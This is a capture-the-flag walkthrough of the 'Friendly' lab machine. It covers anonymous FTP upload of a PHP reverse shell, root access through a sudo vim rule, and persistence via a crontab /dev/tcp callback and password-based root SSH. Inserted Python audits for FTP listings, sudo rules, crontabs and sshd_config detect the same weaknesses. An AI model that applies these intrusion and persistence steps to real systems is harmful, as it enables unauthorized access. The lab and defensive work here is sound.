FRIENDLY MACHINE


I successfully identified several devices on your local network, including the target machine at 11.0.0.13 with the MAC address 08:00:27:a2:9f:c0. This is the crucial first step in identifying your target, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 11.0.0.11
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
11.0.0.1	52:54:00:12:35:00	(Unknown: locally administered)
11.0.0.2	52:54:00:12:35:00	(Unknown: locally administered)
11.0.0.3	08:00:27:0c:be:49	(Unknown)
11.0.0.13	08:00:27:a2:9f:c0	(Unknown)
Now that the machine is deployed, we have to run a port scan to discover its open ports, which are:
  1. port 21 (FTP)
  2. port 80 (HTTP)
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 11.0.0.13 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 18:50 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Initiating ARP Ping Scan at 18:50
Scanning 11.0.0.13 [1 port]
Completed ARP Ping Scan at 18:50, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:50
Scanning 11.0.0.13 [65535 ports]
Discovered open port 21/tcp on 11.0.0.13
Discovered open port 80/tcp on 11.0.0.13
Completed SYN Stealth Scan at 18:50, 4.33s elapsed (65535 total ports)
NSE: Script scanning 11.0.0.13.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:50
NSE: [ftp-bounce 11.0.0.13:21] PORT response: 500 Illegal PORT command
Completed NSE at 18:50, 0.89s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Nmap scan report for 11.0.0.13
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-08-26 18:50:05 CEST for 5s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
80/tcp open  http    syn-ack ttl 64
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:A2:9F:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Next, we try to log in on port 21, which should not require a password, as you can see below:
┌──(root㉿kali)-[/home/luis]
└─# ftp 11.0.0.13
Connected to 11.0.0.13.
220 ProFTPD Server (friendly) [::ffff:11.0.0.13]
Name (11.0.0.13:luis): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46655|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
226 Transfer complete

Now that we have access to the machine, let's create the reverse shell with the web application at this link: 

Next, we create the file in which we will write the reverse shell, named reverse_shell.php, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# nano reverse_shell.php

But first, we need to know our own IP address, which is 11.0.0.11, as you can see below:
┌──(root㉿kali)-[/home/luis]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:4d:8a:0f brd ff:ff:ff:ff:ff:ff
    inet 11.0.0.11/24 brd 11.0.0.255 scope global dynamic noprefixroute eth0
       valid_lft 452sec preferred_lft 452sec
    inet6 fe80::a00:27ff:fe4d:8a0f/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:ef:b8:d2:50 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:efff:feb8:d250/64 scope link proto kernel_ll 
       valid_lft forever preferred_lft forever

Next, we log in to the FTP server again and upload the malicious file with the command you can see below:
ftp> put reverse_shell.php
local: reverse_shell.php remote: reverse_shell.php
229 Entering Extended Passive Mode (|||24541|)
150 Opening BINARY mode data connection for reverse_shell.php
100% |*********************************************************************************|  5490       31.73 MiB/s    00:00 ETA
226 Transfer complete
5490 bytes sent in 00:00 (224.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49914|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
-rw-r--r--   1 ftp      nogroup      5490 Aug 26 16:56 reverse_shell.php
226 Transfer complete
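
From the defender's side, the listing above already shows the problem: a file owned by the anonymous FTP account, with a PHP extension, in a directory that Apache serves. The following check is an added example, not part of the original write-up; the extension list and the account names are assumptions, and the third sample line is constructed.

```python
import re
from pathlib import PurePosixPath

# Constructed sample: the two listing lines from the FTP session above, plus
# one invented double-extension name to show the suffix handling.
SAMPLE_LISTING = """\
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
-rw-r--r--   1 ftp      nogroup      5490 Aug 26 16:56 reverse_shell.php
-rw-r--r--   1 root     root          120 Aug 26 17:01 banner.php.bak
"""

# Assumption: extensions an Apache + PHP setup hands to the interpreter.
EXECUTABLE_EXTS = {".php", ".phtml", ".phar"}
# Assumption: accounts that end up owning anonymous FTP uploads.
ANON_OWNERS = {"ftp", "nobody"}

# One "ls -l" style line as printed by the FTP server (or by nmap's ftp-anon).
LINE_RE = re.compile(
    r"^(?P<mode>[-dlbcps][-rwxsStT]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\w{3}\s+\d{1,2}\s+(?:\d{4}|\d{1,2}:\d{2})\s+(?P<name>.+)$"
)

def audit_listing(text):
    """Return (file name, reasons) for every entry that deserves a look."""
    findings = []
    for line in text.splitlines():
        # Tolerate the "| " / "|_" prefixes of nmap script output.
        m = LINE_RE.match(line.lstrip("|_ ").rstrip())
        if not m or m["mode"].startswith("d"):
            continue
        reasons = []
        if m["owner"] in ANON_OWNERS:
            reasons.append("owned by anonymous FTP account")
        # Every suffix is checked because some Apache handler mappings match
        # any extension of a file name, not only the last one.
        suffixes = {s.lower() for s in PurePosixPath(m["name"]).suffixes}
        if suffixes & EXECUTABLE_EXTS:
            reasons.append("server-executable extension")
        if reasons:
            findings.append((m["name"], reasons))
    return findings

if __name__ == "__main__":
    for name, reasons in audit_listing(SAMPLE_LISTING):
        print(name, "->", "; ".join(reasons))
```

The underlying fix is to keep the FTP root out of the web document root, or to make it read-only for anonymous users.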

Now we must open a listener on the port that we wrote in reverse_shell.php, which is 4444, as you can see below.
Then we execute the file by loading it in the browser: http://11.0.0.13/reverse_shell.php and, as you can see below, we get the shell.
┌──(root㉿kali)-[/home/luis]
└─# nc -lvp 4444     
listening on [any] 4444 ...
11.0.0.13: inverse host lookup failed: Unknown host
connect to [11.0.0.11] from (UNKNOWN) [11.0.0.13] 39252
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
 12:58:32 up 10 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Now we must run the following commands to make the shell stable and fully interactive, as you can see below:
  1. script /dev/null -c bash
  2. ^Z (Ctrl+Z)
  3. stty raw -echo;fg
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=bash

$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@friendly:/$ ^Z
zsh: suspended  nc -lvp 4444
                                                                                                                              
┌──(root㉿kali)-[/home/luis]
└─# stty raw -echo;fg  
[1]  + continued  nc -lvp 4444
			reset xterm

www-data@friendly:/$ export SHELL=bash
www-data@friendly:/$ export TERM=xterm

Now we have to find the user.txt and root.txt flags. Let's list the files with these commands:

  • cd /home/ (to change to the /home directory)
  • ls (to list the files, folders, etc.)
  • cd RiJaba1 (to change to the RiJaba1 directory)
  • ls (to list the files, folders, etc.)
  • cat user.txt (to read the user flag)

www-data@friendly:/$ cd /home/
www-data@friendly:/home$ ls
RiJaba1
www-data@friendly:/home$ cd RiJaba1
www-data@friendly:/home/RiJaba1$ ls
CTF  Private  YouTube  user.txt
www-data@friendly:/home/RiJaba1$ cat user.txt

Gotcha! We have obtained the user flag
b8cff8c9008e1c98a1f2937b4475acd6

Now we must find the root.txt flag. Let's run sudo -l, because we need to escalate privileges.
www-data@friendly:/$ sudo -l
Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim

We become root, as you can see below, with this command, which was found on this webpage: https://gtfobins.github.io/gtfobins/vim/.



www-data@friendly:/$ sudo vim -c ':!/bin/bash'

root@friendly:/# whoami
root
root@friendly:/# cd /home/
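
The sudo rule above is the root cause of the escalation: vim can start a shell, so allowing it under sudo is the same as allowing a root shell. The following audit of `sudo -l` output is an added example, not part of the original write-up; the list of shell-capable binaries is a short, non-exhaustive assumption, and the second rule in the sample is constructed.

```python
import re
from posixpath import basename

# The "sudo -l" output shown above, plus one constructed rule for contrast.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
    (root) /opt/backup/run-backup.sh
"""

# Assumption: a small, non-exhaustive set of programs that can start a shell
# or run arbitrary commands (GTFOBins documents many more).
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "man", "find", "awk",
                 "env", "python3", "perl", "bash", "sh"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"([A-Z_]+):\s*")   # NOPASSWD:, SETENV:, ...

def parse_rules(text):
    """Yield one dict per command in the '(runas) TAG: cmd, cmd' lines."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m["rest"], set()
        while (t := TAG_RE.match(rest)):
            tags.add(t[1])
            rest = rest[t.end():]
        for cmd in (c.strip() for c in rest.split(",")):
            if cmd:
                rules.append({"runas": m["runas"].strip(), "tags": tags, "command": cmd})
    return rules

def audit_sudo_l(text):
    """Flag rules that amount to an unrestricted shell for the run-as user."""
    findings = []
    for r in parse_rules(text):
        binary = r["command"].split()[0]
        if binary == "ALL":
            risk = "any command allowed"
        elif basename(binary) in SHELL_CAPABLE:
            risk = "binary can spawn a shell as " + r["runas"]
        else:
            continue
        findings.append({"command": r["command"], "runas": r["runas"],
                         "nopasswd": "NOPASSWD" in r["tags"], "risk": risk})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f)
```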

Now we run this command, which lets us locate the file root.txt, as you can see below.
root@friendly:/home# find / -name root.txt
/var/log/apache2/root.txt
/root/root.txt
root@friendly:/home# cat /root/root.txt
Not yet! Find root.txt.
root@friendly:/home# cat /var/log/apache2/root.txt

Gotcha! We have obtained the root flag
66b5c58f3e83aff307441714d3e28d2f

Persistence with crontab
Now let's maintain access to the machine with crontab, as you can see below.

root@friendly:/home# crontab -e
no crontab for root - using an empty one

Select an editor.  To change later, run 'select-editor'.
  1. /bin/nano        <---- easiest
  2. /usr/bin/vim.basic
  3. /usr/bin/vim.tiny

Choose 1-3 [1]: 1
No modification made
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
We have to add the reverse shell, as you can see below, with this toolkit, which is:

Persistence 1 crontab
# m h  dom mon dow   command
  * *  *    *   *     /bin/bash -c 'bash -i >& /dev/tcp/11.0.0.11/443 0>&1'

Then we should get a shell within 1 minute, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# nc -lvp 443
listening on [any] 443 ...
11.0.0.13: inverse host lookup failed: Unknown host
connect to [11.0.0.11] from (UNKNOWN) [11.0.0.13] 43482
bash: cannot set terminal process group (729): Inappropriate ioctl for device
bash: no job control in this shell
root@friendly:~#
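
A crontab entry like the one above is easy to find during incident response, because legitimate jobs almost never open a network redirection or start an interactive shell. The following detection is an added example, not part of the original write-up; the sample is built from the crontab line above and the backup example from the crontab template, and the two indicator patterns are assumptions that a real deployment would extend.

```python
import re

# Constructed sample: the entry added above and the template's backup example.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
  * *  *    *   *     /bin/bash -c 'bash -i >& /dev/tcp/11.0.0.11/443 0>&1'
0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
"""

NET_REDIRECT = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/(\d+)")   # bash pseudo-device
INTERACTIVE_SH = re.compile(r"\b(?:ba|da|z)?sh\s+-i\b")          # sh -i, bash -i, ...
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")            # MAILTO=..., PATH=...

def parse_crontab(text):
    """Return (schedule, command) pairs from a per-user crontab."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):                 # @reboot, @hourly, ...
            parts = line.split(None, 1)
            if len(parts) == 2:
                jobs.append((parts[0], parts[1]))
        else:                                    # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) == 6:
                jobs.append((" ".join(parts[:5]), parts[5]))
    return jobs

def audit_crontab(text):
    """Flag jobs whose command looks like a call-back shell."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        net = NET_REDIRECT.search(command)
        if net:
            reasons.append("bash network redirection to %s:%s" % net.groups())
        if INTERACTIVE_SH.search(command):
            reasons.append("interactive shell started without a terminal")
        if reasons:
            findings.append({"schedule": schedule, "command": command,
                             "reasons": reasons,
                             "every_minute": schedule == "* * * * *"})
    return findings

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f["schedule"], "|", f["command"], "|", "; ".join(f["reasons"]))
```

On a live host the same check should be run over every user's crontab under /var/spool/cron/crontabs and over the system files in /etc/cron.d.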

Persistence with SSH ROOT
Now let's maintain access to the machine over the SSH protocol, but first we have to do the following steps, which you can see below:
  • apt update -y (to update the package lists)
root@friendly:~# apt update -y
apt update -y

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Get:1 http://security.debian.org/debian-security bullseye-security InRelease [27.2 kB]
Get:2 http://deb.debian.org/debian bullseye InRelease [75.1 kB]
Get:3 http://deb.debian.org/debian bullseye-updates InRelease [44.0 kB]
Get:4 http://security.debian.org/debian-security bullseye-security/main Sources [252 kB]
Get:5 http://security.debian.org/debian-security bullseye-security/contrib Sources [1,128 B]
Get:6 http://security.debian.org/debian-security bullseye-security/main amd64 Packages [392 kB]
Get:7 http://security.debian.org/debian-security bullseye-security/main Translation-en [261 kB]
Get:8 http://security.debian.org/debian-security bullseye-security/contrib amd64 Packages [2,880 B]
Get:9 http://security.debian.org/debian-security bullseye-security/contrib Translation-en [2,512 B]
Get:10 http://deb.debian.org/debian bullseye/main Sources [8,500 kB]
Get:11 http://deb.debian.org/debian bullseye/main amd64 Packages [8,066 kB]
Get:12 http://deb.debian.org/debian bullseye/main Translation-en [6,235 kB]
Get:13 http://deb.debian.org/debian bullseye-updates/main Sources.diff/Index [26.3 kB]
Get:14 http://deb.debian.org/debian bullseye-updates/main amd64 Packages.diff/Index [26.3 kB]
Get:15 http://deb.debian.org/debian bullseye-updates/main Translation-en.diff/Index [12.8 kB]
Get:16 http://deb.debian.org/debian bullseye-updates/main Sources T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [4,354 B]
Get:17 http://deb.debian.org/debian bullseye-updates/main amd64 Packages T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [6,365 B]
Get:16 http://deb.debian.org/debian bullseye-updates/main Sources T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [4,354 B]
Get:17 http://deb.debian.org/debian bullseye-updates/main amd64 Packages T-2023-12-29-1403.39-F-2023-03-25-2025.40.pdiff [6,365 B]
Get:18 http://deb.debian.org/debian bullseye-updates/main Translation-en T-2025-07-21-2004.39-F-2023-05-24-2006.01.pdiff [3,378 B]
Get:18 http://deb.debian.org/debian bullseye-updates/main Translation-en T-2025-07-21-2004.39-F-2023-05-24-2006.01.pdiff [3,378 B]
Get:19 http://deb.debian.org/debian bullseye-updates/main Sources [7,908 B]
Get:20 http://deb.debian.org/debian bullseye-updates/main Translation-en [10.5 kB]
Get:21 http://deb.debian.org/debian bullseye-updates/main amd64 Packages [18.8 kB]
Fetched 24.0 MB in 8s (3,151 kB/s)
Reading package lists...
Building dependency tree...
Reading state information...
137 packages can be upgraded. Run 'apt list --upgradable' to see them.
  • passwd root (to change the root password).
root@friendly:~# passwd root
passwd root
New password: 123123
Retype new password: 123123
passwd: password updated successfully
  • apt install openssh-server (to install the OpenSSH server).
root@friendly:~# apt install openssh-server
apt install openssh-server

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Reading package lists...
Building dependency tree...
Reading state information...
The following additional packages will be installed:
  libwrap0 openssh-client openssh-sftp-server runit-helper
Suggested packages:
  keychain libpam-ssh monkeysphere ssh-askpass molly-guard ufw
The following NEW packages will be installed:
  libwrap0 openssh-server openssh-sftp-server runit-helper
The following packages will be upgraded:
  openssh-client
1 upgraded, 4 newly installed, 0 to remove and 136 not upgraded.
Need to get 1,438 kB of archives.
After this operation, 1,890 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://deb.debian.org/debian bullseye/main amd64 libwrap0 amd64 7.6.q-31 [59.0 kB]
Get:2 http://security.debian.org/debian-security bullseye-security/main amd64 openssh-client amd64 1:8.4p1-5+deb11u5 [932 kB]
Get:3 http://deb.debian.org/debian bullseye/main amd64 runit-helper all 2.10.3 [7,808 B]
Get:4 http://security.debian.org/debian-security bullseye-security/main amd64 openssh-sftp-server amd64 1:8.4p1-5+deb11u5 [52.9 kB]
Get:5 http://security.debian.org/debian-security bullseye-security/main amd64 openssh-server amd64 1:8.4p1-5+deb11u5 [386 kB]
apt-listchanges: Reading changelogs...
dpkg-preconfigure: unable to re-open stdin: 
Fetched 1,438 kB in 2s (718 kB/s)
(Reading database ... 36396 files and directories currently installed.)
Preparing to unpack .../openssh-client_1%3a8.4p1-5+deb11u5_amd64.deb ...
Unpacking openssh-client (1:8.4p1-5+deb11u5) over (1:8.4p1-5+deb11u1) ...
Selecting previously unselected package libwrap0:amd64.
Preparing to unpack .../libwrap0_7.6.q-31_amd64.deb ...
Unpacking libwrap0:amd64 (7.6.q-31) ...
Selecting previously unselected package openssh-sftp-server.
Preparing to unpack .../openssh-sftp-server_1%3a8.4p1-5+deb11u5_amd64.deb ...
Unpacking openssh-sftp-server (1:8.4p1-5+deb11u5) ...
Selecting previously unselected package runit-helper.
Preparing to unpack .../runit-helper_2.10.3_all.deb ...
Unpacking runit-helper (2.10.3) ...
Selecting previously unselected package openssh-server.
Preparing to unpack .../openssh-server_1%3a8.4p1-5+deb11u5_amd64.deb ...
Unpacking openssh-server (1:8.4p1-5+deb11u5) ...
Setting up runit-helper (2.10.3) ...
Setting up openssh-client (1:8.4p1-5+deb11u5) ...
Setting up libwrap0:amd64 (7.6.q-31) ...
Setting up openssh-sftp-server (1:8.4p1-5+deb11u5) ...
Setting up openssh-server (1:8.4p1-5+deb11u5) ...

Creating config file /etc/ssh/sshd_config with new version
Creating SSH2 RSA key; this may take some time ...
3072 SHA256:xjQJYHzvg+zDU8TPUGfZvK7wv+Af2UFWHmtM+4rpYRQ root@friendly (RSA)
Creating SSH2 ECDSA key; this may take some time ...
256 SHA256:Dyz8jUWoShln4QQi/84pZDmkqbuuxcn73BH2qSomHlM root@friendly (ECDSA)
Creating SSH2 ED25519 key; this may take some time ...
256 SHA256:WGoO5zlblfIgVrkgpAHyJsGbvnnLLBc3uba7sdgnitM root@friendly (ED25519)
Created symlink /etc/systemd/system/sshd.service → /lib/systemd/system/ssh.service.
Created symlink /etc/systemd/system/multi-user.target.wants/ssh.service → /lib/systemd/system/ssh.service.
rescue-ssh.target is a disabled or a static unit, not starting it.
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for libc-bin (2.31-13+deb11u5) ...
  • systemctl start ssh (to start the SSH service).
root@friendly:~# systemctl start ssh
systemctl start ssh
  • sudo nmap -n -Pn -sC 11.0.0.13 -vvv (to check that port 22 is open).
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn -sC 11.0.0.13 -vvv 
[sudo] contraseña para luis: 
Lo siento, pruebe otra vez.
[sudo] contraseña para luis: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 19:34 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
Initiating ARP Ping Scan at 19:34
Scanning 11.0.0.13 [1 port]
Completed ARP Ping Scan at 19:34, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:34
Scanning 11.0.0.13 [1000 ports]
Discovered open port 22/tcp on 11.0.0.13
Discovered open port 80/tcp on 11.0.0.13
Discovered open port 21/tcp on 11.0.0.13
Completed SYN Stealth Scan at 19:34, 0.12s elapsed (1000 total ports)
NSE: Script scanning 11.0.0.13.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:34
NSE: [ftp-bounce 11.0.0.13:21] PORT response: 500 Illegal PORT command
Completed NSE at 19:34, 0.86s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
Nmap scan report for 11.0.0.13
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-08-26 19:34:08 CEST for 1s
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
|_-rw-r--r--   1 ftp      nogroup      5490 Aug 26 16:56 reverse_shell.php
22/tcp open  ssh     syn-ack ttl 64
| ssh-hostkey: 
|   3072 03:44:1d:c8:b3:c2:f6:ea:07:a1:a0:1e:67:60:07:1c (RSA)
|   256 74:a1:b4:17:9b:85:fa:f8:7a:8d:68:55:0e:d6:6a:95 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMVio28pIxc/EMCkknbW5H7OUYbLOxAACjUOxyyu3oecP9xCRPRFUmSf9ZqBpWhYmmCxLYoNiE5gvp7qlsNFJY0=
|   256 5f:c2:37:bf:78:1e:81:7f:68:f2:ba:1d:32:06:6c:7e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHhdThFcS1XCMuwvt+98NtQCgF7W6XDJn9ByN0Raft9p
80/tcp open  http    syn-ack ttl 64
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:A2:9F:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:34
Completed NSE at 19:34, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)
  • Edit the file /etc/ssh/sshd_config as you can see below.
┌──(luis㉿kali)-[~]
└─$/etc/ssh/sshd_config  

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes    (edit this setting)
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
  • sudo systemctl restart ssh (to restart the SSH service)
  • systemctl status ssh (to check that the SSH service is running)
root@friendly:/# sudo systemctl restart ssh
root@friendly:/# systemctl status ssh
* ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e>
     Active: active (running) since Tue 2025-08-26 13:45:09 EDT; 11s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 11097 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCES>
   Main PID: 11098 (sshd)
      Tasks: 1 (limit: 2337)
     Memory: 1.0M
        CPU: 21ms
     CGroup: /system.slice/ssh.service
             -11098 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Aug 26 13:45:09 friendly systemd[1]: Starting OpenBSD Secure Shell server...
Aug 26 13:45:09 friendly sshd[11098]: Server listening on 0.0.0.0 port 22.
Aug 26 13:45:09 friendly sshd[11098]: Server listening on :: port 22.
Aug 26 13:45:09 friendly systemd[1]: Started OpenBSD Secure Shell server.
To sum up, if you have followed all the previous steps, you should be able to get a shell as root, as you can see below.
┌──(luis㉿kali)-[~]
└─$ ssh root@11.0.0.13
The authenticity of host '11.0.0.13 (11.0.0.13)' can't be established.
ED25519 key fingerprint is SHA256:WGoO5zlblfIgVrkgpAHyJsGbvnnLLBc3uba7sdgnitM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '11.0.0.13' (ED25519) to the list of known hosts.
root@11.0.0.13's password: 
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 11 04:00:51 2023
root@friendly:~#
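
The sshd_config change above is what a configuration audit should catch. The following check is an added example, not part of the original write-up: it works out the effective global values of PermitRootLogin and PasswordAuthentication from the file text, using the sshd rule that the first value read for a keyword wins. It assumes a single file; Include files and Match blocks are not resolved (on a live host, `sshd -T` prints the configuration the daemon actually uses).

```python
import re

# Constructed sample: the edited excerpt of /etc/ssh/sshd_config shown above.
SAMPLE_SSHD_CONFIG = """\
# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
"""

# OpenSSH built-in defaults for the two keywords checked here.
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes"}

def effective_settings(text):
    """Return the global keyword -> value map, with defaults filled in."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # commented lines have no effect
            continue
        # Keyword and value are separated by whitespace or by a single '='.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        keyword = parts[0].lower()                # keywords are case-insensitive
        value = parts[1].strip().strip('"').lower() if len(parts) > 1 else ""
        if keyword == "match":
            break                                 # conditional blocks: out of scope here
        settings.setdefault(keyword, value)       # sshd keeps the first value it reads
    return {**DEFAULTS, **settings}

def audit_sshd_config(text):
    """Report root-login settings that allow what the page demonstrates."""
    s = effective_settings(text)
    findings = []
    if s["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root may use any enabled login method")
        if s["passwordauthentication"] == "yes":
            findings.append("root can log in over SSH with a password")
    return findings

if __name__ == "__main__":
    for finding in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(finding)
```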

I hope you liked it and learned something new.

This article was written for ethical purposes.

Good Hack
